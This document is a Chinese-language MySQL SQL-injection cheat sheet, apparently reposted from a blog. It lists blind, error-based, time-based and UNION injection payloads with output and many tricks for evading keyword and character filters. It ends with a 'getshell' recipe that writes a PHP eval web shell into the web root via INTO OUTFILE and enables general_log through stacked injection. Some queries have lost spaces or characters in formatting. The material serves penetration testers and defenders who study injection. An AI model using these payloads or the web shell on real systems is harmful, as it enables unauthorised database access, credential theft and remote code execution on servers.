常见注入方式
1.Boolean-based blind 布尔盲注
2.Error-based 报错注入
3.AND/OR time-based blind 时间盲注
4.UNION query 联合注入

常用函数
判断是否具有读写权限
注入绕过
1.字段列数不够
2.过滤空格
3.过滤from x
4.过滤逗号
5.过滤大于小于
6.运算比较之空格过滤
7.过滤and or xor not
8.万能密码之or and优先级
9.过滤引号
10.过滤tables
11.过滤select
12.过滤union

  1. 过滤=
    14.过滤updatexml及extractvalue

15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)
16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)
17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)
18.组合过滤之 preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
19.过滤 column
20.order by 注入
tips
1.爆所有表列
2.利用报错发现库表列
3.getshell
常见注入方式
1.Boolean-based blind

left() 用法:left(str, length),即:left(被截取字符串, 截取长度)

mysql> select*fromtestwhereid=1 and left(version(),1)=8;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

ascii()转为ascii编码
substr(string string,num start,num length);

substr()string为字符串;start为起始位置;length为长度。

mysql> select*fromtestwhereid=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

2.Error-based

mysql> select from test where id=1 union select version(),@@version_compile_os,floor(rand(0)2)x from information_schema.character_sets group by x;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
8.0.12osx10.130
8.0.12osx10.131

3.AND/OR time-based blind

mysql> select * from test where id=1 and sleep(2);
idusernamepassword

Time: 2.053s

mysql> select * from test where id=1 or sleep(2);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

Time: 6.226s
4.UNION query

mysql> select from test where id=1 union select from test;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

常用函数
concat:将多个字符串连接成一个字符串
group_concat:返回一个字符串结果,该结果由分组中的值连接组合而成
concat_ws: concat with separator 指定参数之间的分隔符
system_user():系统用户名
user():用户名
current_user:当前用户名
session_user():连接数据库的用户名
database():数据库名
version():数据库版本
load_file():读取本地文件的函数
@@datadir:读取数据库路径(5.0 以上版本)
@@basedir:安装路径
@@version_complie_os:操作系统
@@HOSTNAME 主机名
判断是否具有读写权限
读取

mysql> selectfromtestwhereid=1 and (select count() from mysql.user)>0
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

写入

mysql> select*fromtestwhereid=1 and (select count(file_priv) from mysql.user)>0
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select*fromtestwhereid=1 and (select count(file_priv) from mysql.user)<0
idusernamepassword

注入绕过
1.字段列数不够
mysql> select from test where id=1 union select null,floor(rand(0)2)x from information_schema.tables group by x;
(1222, u'The used SELECT statements have a different number of columns'')

floor函数返回小于等于该值的最大整数.

mysql> select from test where id=1 union select null,null,floor(rand(0)2)x from information_schema.tables group by x; -- 用null或者其他字符填充
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
<null><null>0
<null><null>1

2.过滤空格

mysql> select(username)from(test)where(id)=1;
username
admin
mysql> select * from test where id=1E0union select 1,2,3 --浮点数 1.0
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
123
mysql> selectfrom//test//where/*/id=1;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select*fromtestwhereid=2;
idusernamepassword
2root63a9f0ea7bb98050796b649e85481845
mysql> select*fromtestwhereid=1 union select@1=@1,2,3;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
<null>23
mysql> select*fromtestwhereid=1 union select@1,2,3;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
<null>23

备注: 一个 @ 表示用户定义,@@ 表示系统变量
在php中 s 会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
09:Horizontal Tab
0A:New Line
0B:Vertical Tab
0C:New Page
0D:Carriage Return
A0:MySQL 中 %a0 代表空白符,可以代替空格
20:Space
a0:空格
2B:+
2D:-
7E:~
21:!
40:@
SQLite3:0A 0D 0C 09 20
MySQL5 09:0A 0B 0C 0D A0 20
PosgresSQL:0A 0D 0C 09 20
Oracle 11g:00 0A 0D 0C 09 20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
3.过滤from x

mysql> select * from. test;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

4.过滤逗号
使用 mid(user() from 1 for 1) 或 substr(user() from 1 for 1)

mysql> select * from test where id=1 and (select ascii(substr(user() from 1 for 1)))=114;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 and (substr(user() from 1 for 1))='r';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test limit 1 offset 2;
idusernamepassword
3test098f6bcd4621d373cade4e832627b4f6
mysql> select * from ((select 1)A join (select 2)B join ((select username from test where id=2))D); -- 相当于:UNION SELECT 1,2,3;
12username
12root

5.过滤大于小于
greatest(x,y),返回x和y中较大的那个数 当然可以用非等于 !=

mysql> select greatest(ascii(mid(user(),1,1)),120)=120;
greatest(ascii(mid(user(),1,1)),120)=120
1

以上是判断user()第一个字符的ascii码是否等于120. 若最终结果为120,返回true(1),否则返回false(0),可编写脚本枚举
6.运算比较之空格过滤

mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=110);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=114);
idusernamepassword
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=114);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=115);
idusernamepassword

乘法和除法当然也可以
7.过滤and or xor not
and=&& or=|| xor=| not=! 注意在浏览器中输入部分字符需要url编码,例如&&为%26%26

mysql> select * from test where id=1(ascii(substr(database(),1,1))=116);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=116);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=115);
idusernamepassword
绕过:^, =, !=, %, /, *, &, &&,,, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...

8.万能密码之or and优先级
mysql> select * from test where username='nouser' or '1'='1' or '1'='1' -- - and password='123';

idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb
mysql> select * from test where username='nouser' and password='123' or '1'='1';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

9.过滤引号

mysql> select * from test where username=0x61646d696e;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where username=CHAR(97, 100, 109, 105, 110);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

10.过滤tables

mysql> select table_name from information_schema.partitions where table_schema=database();
TABLE_NAME
test
mysql> select table_name from information_schema.statistics where table_schema=database();
TABLE_NAME
test
mysql> select table_name from information_schema.table_constraints where table_schema=database();
table_name
test
mysql> select table_name from information_schema.KEY_COLUMN_USAGE where table_schema=database();
table_name
test

11.过滤select
(布尔|延时)盲注即可,也可以参考第6条

mysql> select*fromtestwhereid=1 and ascii(substr(database(),1,1))=116;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select*fromtestwhereid=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1);
idusernamepassword

Time: 5.081s
12.过滤union
盲注或者子查询猜解.最好还是编写脚本

mysql> select*fromtestwhereid=2 and (select username from test where id=1)='admin';
idusernamepassword
2root63a9f0ea7bb98050796b649e85481845
  1. 过滤=
    使用like 、rlike 、regexp 或者 使用< 或者 >
mysql> select * from test where id=1 union select 1,2,table_name from information_schema.tables where table_name between 0x61 and 0x7a;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
12CHARACTER_SETS
12COLLATION_CHARACTER_SET_APPLICABILITY
12COLLATIONS
12COLUMN_PRIVILEGES
...................between char(97) and char(122).......................
mysql> select*fromtestwhereid=1 and 1 like 2;
idusernamepassword
mysql> select*fromtestwhereid=1 and 1 like 1;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select 1,2,table_name from information_schema.tables where table_name between 'u' and 'v' limit 0,1;
12TABLE_NAME
12USER_PRIVILEGES
mysql> select 1,2,table_name from information_schema.tables where table_name like 'u%' limit 1 offset 1;
12TABLE_NAME
12users
mysql> select 1,2,table_name from information_schema.tables where table_name > 'u' and table_name < 'v' limit 10,1;
12TABLE_NAME
12user_summary

14.过滤updatexml及extractvalue
mysql> selectfromuserswhereid=1 AND polygon((select from(select * from(select user())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.user() from (select ‘root@localhost’ AS user() from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND GeometryCollection((select from (select * from(select version())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.version() from (select ‘5.5.44-0ubuntu0.14.04.1’ AS version() from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND multipoint((select from(select * from(select @@basedir)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@basedir from (select ‘/usr’ AS @@basedir from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND multilinestring((select from(select * from(select database())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.database() from (select ‘test’ AS database() from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND LINESTRING((select from(select * from(select @@version_compile_os)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@version_compile_os from (select ‘debian-linux-gnu’ AS @@version_compile_os from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND multipolygon((select from(select * from(select @@datadir)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@datadir from (select ‘/var/lib/mysql/‘ AS @@datadir from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 and exp(~(select from (select user() ) a) );
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’

mysql> selectfromuserswhereid=1 union select from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
ERROR 1060 (42S21): Duplicate column name ‘5.5.44-0ubuntu0.14.04.1’

mysql> selectfromuserswhereid=1 and (select 1 from (select count(),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ‘5.5.44-0ubuntu0.14.04.11’ for key ‘group_key’

15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)
上面基本介绍过了.大家都懂

1 || updatexml(1,concat(0x7e,database(),0x7e),1) -- 超过长度可以配合substr
1 %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))
1 || (select user from users limit 1) = 'admin'
1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)
1 || ascii(substr(database(),1,1))=115
16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)

mysql> select*fromtest where id=2(select username from test group by id having id = 1) = 'admin';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

报错注入或者盲注,最主要就是解决limit的问题.用having代替即可
17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)

mysql> select*fromtest where id=2(select substr(group_concat(username),1,5) from test) = 'admin';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb
18.组合过滤之 preg_match('/(andorunionwherelimitgroup byselect)/i', $id)
mysql> select*fromtest where id=-2substr(username,1,5) = 0x61646d696e;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

更新分割线
19.过滤 column
知道表名的前提下join报错爆字段

mysql> selectfromuserswhereid=1 union select 1,2,(select from (select * from users a join users b) c);
ERROR 1060 (42S21): Duplicate column name ‘id’

mysql> selectfromuserswhereid=1 union select 1,2,(select from (select * from users a join users b using(id)) c);
ERROR 1060 (42S21): Duplicate column name ‘username’

mysql> selectfromuserswhereid=1 union select 1,2,(select from (select * from users a join users b using(id,username)) c);
ERROR 1060 (42S21): Duplicate column name ‘password’

20.order by 注入
基于报错

mysql> select*fromusersorder byid=rand(updatexml(1,concat(0x7e,database(),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’

mysql> select*fromusersorder byid=1 and updatexml(1,concat(0x7e,database(),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’

基于返回信息不同

mysql> select*fromusersorder byid=1 and ascii(substr((select database()),1,1))>1;
idusernamepasswordaddress
2root63a9f0ea7bb98050796b649e85481845baidu.com
3test098f6bcd4621d373cade4e832627b4f67xz.cc
4testtest05a671c66aefea124cc08b76ea6d30bb04z.net
1admin21232f297a57a5a743894a0e4a801fc3localhost
mysql> select*fromusersorder byid=1 and ascii(substr((select database()),1,1))<1;
idusernamepasswordaddress
1admin21232f297a57a5a743894a0e4a801fc3localhost
2root63a9f0ea7bb98050796b649e85481845baidu.com
3test098f6bcd4621d373cade4e832627b4f67xz.cc
4testtest05a671c66aefea124cc08b76ea6d30bb04z.net

基于时间

mysql> select*fromusersorder byid=1 and if(1=1,sleep(2),1);
idusernamepasswordaddress
1admin21232f297a57a5a743894a0e4a801fc3localhost
2root63a9f0ea7bb98050796b649e85481845baidu.com
3test098f6bcd4621d373cade4e832627b4f67xz.cc
4testtest05a671c66aefea124cc08b76ea6d30bb04z.net

4 rows in set (2.01 sec)
tips
'=' <--> 'like' <--> 'in' --> 'regexp' <--> 'rlike' --> '>' <--> '<'
1.爆所有表列
(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
2.利用报错发现库表列
mysql> select*fromuserswhereusername='admin' and polygon(username);
(1367, u”Illegal non geometric ‘test.users.username‘ value found during parsing”)

3.getshell
show variables like '%plugin%';
show variables like "secure_file_priv";
show variables like '%general_log%';
use mysql;
Drop TABLE IF EXISTS shell;
Create TABLE shell (shell text NOT NULL);
Insert INTO shell (shell) VALUES('<?php @eval($_POST[1]);?>');
select shell from shell into outfile '/var/www/html/1.php';
Drop TABLE IF EXISTS shell;
如果存在堆叠注入直接 id=1';set global general_log = on;

原文地址:

http://04z.net/archives/2030ee36.html